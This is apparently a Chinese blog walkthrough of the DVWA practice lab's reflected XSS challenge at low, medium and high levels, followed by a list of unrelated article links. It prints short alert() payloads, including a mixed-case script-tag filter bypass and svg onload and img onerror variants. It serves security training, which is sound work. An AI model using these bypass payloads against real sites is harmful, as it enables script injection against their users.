当前位置: 首页 > news >正文

【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦

news 2025/7/31 0:40:21

一、低级low

简单拿捏

<script>alert(123)</script>

二、中级middle

源码过滤了script但是没有过滤大小写,改成大写S

<Script>alert(123)</script>

三、高级high

比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行

<svg onload=alert(123)>
<img src=x onerror=alert(123)>

http://www.lryc.cn/news/478931.html

相关文章:

  • imu_tk配置教程(锁死ubuntu18.04,不要22.04)
  • Vue 的 keep-alive
  • linux进程的状态之环境变量
  • 【系统架构设计师】预测试卷一:论文(包括4篇论文主题对应的写作要点分析)
  • 东胜物流软件 AttributeAdapter.aspx SQL 注入漏洞复现
  • 2024年网鼎杯青龙组|MISC全解
  • 查询引擎的演变之旅 | OceanBase原理解读
  • 轻松理解操作系统 - Linux 软硬链接是什么?
  • Redis - 数据库管理
  • VBA02-初识宏——EXCEL录像机
  • Unity网络开发基础(part5.网络协议)
  • forEach可以遍历不可枚举属性吗
  • Docsify文档编辑器:Windows系统下个人博客的快速搭建与发布公网可访问
  • 索引基础篇
  • 多进程与多线程分不清?
  • 【零基础学习CAPL】——XML工程创建与使用详解
  • 市场营销应该怎么学?
  • 作为一个前端开发者 以什么步骤学习后端技术
  • 大数据新视界 -- 大数据大厂之经典案例解析:广告公司 Impala 优化的成功之道(下)(10/30)
  • yolov8涨点系列之Concat模块改进
  • JavaAPI(1)
  • 【大模型】通过Crew AI 公司的崛起之路学习 AI Agents 的用法
  • Python接口自动化测试实战
  • 前端Web用户 token 持久化
  • 【测试工具篇一】全网最强保姆级教程抓包工具Fiddler(2)
  • ONLYOFFICE 文档8.2更新评测:PDF 协作编辑、性能优化及更多新功能体验
  • 【WebRTC】视频采集模块中各个类的简单分析
  • 【大模型系列】Grounded-VideoLLM(2024.10)
  • EV录屏好用吗?盘点2024年10款专业好用的录屏软件。
  • Pandas | 理性判断数据是否存在缺失值的一种方法